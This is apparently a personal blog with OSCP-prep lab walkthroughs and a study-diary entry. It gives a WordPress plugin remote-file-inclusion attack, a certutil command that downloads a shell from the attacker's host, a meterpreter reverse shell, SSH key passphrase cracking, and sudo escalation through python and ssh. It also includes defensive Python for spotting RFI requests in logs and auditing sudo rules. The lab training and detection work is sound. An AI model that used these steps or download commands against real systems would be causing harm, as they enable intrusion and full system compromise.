For my OSCP Preparations using HackTheBox, I’ll be following an awesome list made by TJ Null and the Mayor, Joe Helle. The list is curated here for your enjoyment. I did make a few changes – I sorted it out into Linux and Windows, and sorted from easiest to most difficult.
The purpose of doing this is to build up muscle memory in methodology, as well as get some great notes for taking the OSCP with.
For each box, I will write a walkthrough, and I will make a Youtube video of it as well. If it is during my stream time, I will livestream the work on it.
Thanks for coming along on the journey! I’m looking forward to this and crushing the OSCP before Christmas!
So the Boats box is a neat one, and I thoroughly enjoyed my first attempt at it live on Twitch the other day. Let’s dive right in and get after this!
Once we add the IP address to our /etc/hosts file, let’s get after this box with a good ol’ AutoRecon scan and check out the results. We see a bunch of ports open, including port 80, so while the scan is running, we can go check there.
Now, anytime I see a WordPress site, I get excited. And any time I see a potential plugin, I get even more excited. See that shopping cart label in the top right? That’s where I get excited.
So I kicked off a wpscan, and didn’t find anything, but I know there’s a plugin, so I clicked on the shopping cart and viewed the source. I see a plugin called “The Cart Press.” Let’s find vulnerabilities.
Over on Exploit Database, we see a few. The Remote File Inclusion one really piques my interest. Remote file inclusion will require us to host our own file to be called out by the vulnerability. Let’s hope we are on the right version and give it a shot!
Next step is to download one of my favorite remote shells and host it on a simple HTTP Server. I use the shell from https://github.com/namansahore/Remote-File-Inclusion-Shell. I highly recommend it (P.S., it’s forked on my repository as well!). Host that in the directory of your choice (I named mine shell.php) and fire up a simpleHTTPServer (I used sudo and did it on port 80).
Boom, that was where I browsed to from Exploit-DB, and below is what you get when you pop my favorite remote file!
At this point the remote shell won’t work, but you can issue Windows commands like dir to verify you have control. A great command to use in this case is certutil, and you can upload files utilizing it.
Second, ensure your new shell.exe file is being hosted by your SimpleHTTPServer, and upload it with certutil. Here is the command line that worked for me: certutil -f http://10.10.0.11/shell.exe shell.exe
At this point, use msfconsole to kick off a meterpreter listener, as shown below, and run that shell.exe command! It’s going to be slow to connect, but once it does, you will be nt authority/system and be able to go get your flags!
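From the defender’s side, the inclusion above shows up in the web server’s access log as a request parameter whose value is a URL on some other host. The following is an added example, not code from the post or from any tool it mentions: it scans constructed combined-format log lines for that pattern (including double-encoded values and PHP stream wrappers) and lets you allowlist your own hostnames. The log lines, IPs, and the plugin path are all placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Start of an Apache/nginx combined-format line: client IP ... "METHOD target HTTP/x".
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*"')
REMOTE_URL_RE = re.compile(r'^(https?|ftps?)://(?P<host>[^/:?#]+)', re.IGNORECASE)
# PHP stream wrappers that also make include() read code from outside the web root.
WRAPPERS = ("php://", "data:", "expect://")

def rfi_findings(log_lines, own_hosts=()):
    """Return one finding per request parameter whose value would make a
    PHP include() fetch code from a remote host or through a stream wrapper."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = unquote(raw)  # parse_qsl decoded once; a second pass catches %2568ttp-style payloads
            url = REMOTE_URL_RE.match(value)
            if url and url.group("host").lower() not in own:
                reason = "remote URL in parameter"
            elif value.lower().startswith(WRAPPERS):
                reason = "PHP stream wrapper in parameter"
            else:
                continue
            findings.append({"ip": m.group("ip"), "param": name, "value": value, "reason": reason})
    return findings

# Constructed sample log (placeholder hosts, IPs and plugin path; not from the box).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /wp-content/plugins/example-plugin/file.php?inc=http://203.0.113.7/payload.txt HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2021:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 100',
    '10.0.0.7 - - [01/Jan/2021:10:00:02 +0000] "GET /page.php?p=http://boats.example/images/a.png HTTP/1.1" 200 300',
    '10.0.0.8 - - [01/Jan/2021:10:00:03 +0000] "GET /i.php?f=php%3A%2F%2Finput HTTP/1.1" 200 50',
    '10.0.0.9 - - [01/Jan/2021:10:00:04 +0000] "GET /i.php?f=%2568ttp%3A%2F%2F203.0.113.9%2Fx HTTP/1.1" 200 50',
]

if __name__ == "__main__":
    for f in rfi_findings(SAMPLE_LOG, own_hosts=("boats.example",)):
        print(f"{f['ip']}: {f['reason']} ({f['param']}={f['value']})")
```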
Thanks for catching the next writeup in my OSCP Prep series of writeups for CyberSecLabs! Stay tuned for the YouTube video to follow! And as always, keep hacking!
After adding the alias shares.csl to my /etc/hosts file, I kicked off AutoRecon and took a close look at the results. Here we see port 21 (FTP), port 80 (HTTP), port 111 (RPC), port 2049 (NFS), and port 27853 (Running SSH!), as well as some higher level ports. This high SSH port seemed odd to me.
Looking into the easy ports here, with NFS (Network File System), we take a look at the nmap scan that was run on Port 111, and we see the following mount:
We mount this drive and see what we’ve got:
Thinking back to the high-port number running SSH, I bet that .ssh directory may be interesting!
Unfortunately, when you try to log in using the private SSH key (and if you paid attention above, you saw this coming), you’ll be denied access and asked for a passphrase, because the key is …. ENCRYPTED! But have no fear, ssh2john is here!
Once you have it prepped for john, run john with the rockyou.txt wordlist to find the passphrase for the original key!
Now that we have the passphrase, don’t forget to chmod 600 the original private key, and let’s log in. Once logged in, run sudo -l, and we see that we can run /usr/bin/pkexec or /usr/bin/python3 as a user named amy.
It’s trivial at this point to get on as amy. Simply search GTFOBins for the python binary, and take a look at sudo privileges, https://gtfobins.github.io/gtfobins/python/. Switching users to amy and running python is a breeze.
Now, as amy, don’t forget to get the access.txt flag, and let’s sudo -l again! Now you see that we can run /usr/bin/ssh as anyone we want with no password, including root!
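The chain on this box (an interpreter as amy, then ssh as anyone) is exactly what a sudoers review should catch before an attacker does. The following is an added example, not code from the post: it parses constructed `sudo -l` output and rates each rule by whether the binary can act as the run-as user. The username, hostname, and the script path in the sample are placeholders, and the list of shell-capable binaries is an assumption you would extend for your environment.

```python
import re

# Binaries that can execute arbitrary commands or open a session as the
# run-as user, so a rule naming one of them hands over that whole account.
SHELL_CAPABLE = {"sh", "bash", "python", "python2", "python3", "perl", "ruby",
                 "ssh", "pkexec", "vi", "vim", "less", "find", "awk"}

# One privilege line of `sudo -l` output: "(runas[:group]) [TAG: ...] cmd, cmd".
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

def audit_sudo_rules(sudo_l_output):
    """Return one finding per command in the `sudo -l` text, rated by how
    directly it lets the caller act as the run-as user."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            parts = cmd.split()
            binary = parts[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                severity = "critical"
            elif binary in SHELL_CAPABLE and len(parts) == 1:
                # Unrestricted interpreter/session tool: equivalent to granting the account.
                severity = "critical" if runas in ("ALL", "root") else "high"
            elif binary in SHELL_CAPABLE:
                severity = "medium"  # pinned to a script: verify who can write that script
            else:
                severity = "info"
            findings.append({"runas": runas, "command": cmd, "nopasswd": nopasswd, "severity": severity})
    return findings

# Constructed sample output (placeholder user, host and script path).
SAMPLE_SUDO_L = """\
Matching Defaults entries for userone on shares:
    env_reset, mail_badpass

User userone may run the following commands on shares:
    (amy) NOPASSWD: /usr/bin/pkexec, /usr/bin/python3
    (ALL) NOPASSWD: /usr/bin/ssh
    (root) /usr/bin/python3 /opt/backup.py
    (root) /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[{f['severity']:8}] ({f['runas']}) {f['command']}  nopasswd={f['nopasswd']}")
```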
This will be Day 3 of my OSCP Preparation. The mind-map linked in the previous post is what I’m still working on, but I just want to first take a moment out of discussing purely hacking to talk about how humbled I am. Veteran Security concluded their board elections a little over a week ago, and on June 1st, 2020, I took over as the Board Chair for the company. It’s an amazing organization owned and run by veterans for veterans transitioning into cyber security. We have some pretty awesome things planned, but that’s nothing compared to what the group has already done for so many, myself included. More than simply providing resources and guides to transition, Veteran Security (VetSec, Inc.) provides a much needed community – a place for veterans to discuss the issues that face our community and be there for one another.
Now then, Day 3 of OSCP. I have completed OverTheWire: Bandit through Level 23, and I have completed Wave 1 of the Zero to Hero blog for TryHackMe. Both platforms have been great for solidifying basic Linux command knowledge, establishing a solid methodology, and exposing me to many different vulnerabilities present in both Linux and Windows.
Much of what I’ve done has been walkthrough style so far. I anticipate around next week (Day 10 OSCP or so) I will move into the lists of machines provided by TJ-Null and start working on VulnHub and HackTheBox machines. This is where it’ll get real.
I continue to make videos for my YouTube Channel, like this walkthrough of LazyAdmin on TryHackMe, and I continue to stream daily. This has been a great way for me to reinforce the knowledge I’ve gained by doing the same box a couple times.
Anyways, if you like following and learning along with me, keep checking out my YouTube and my Twitch and I’ll see you there!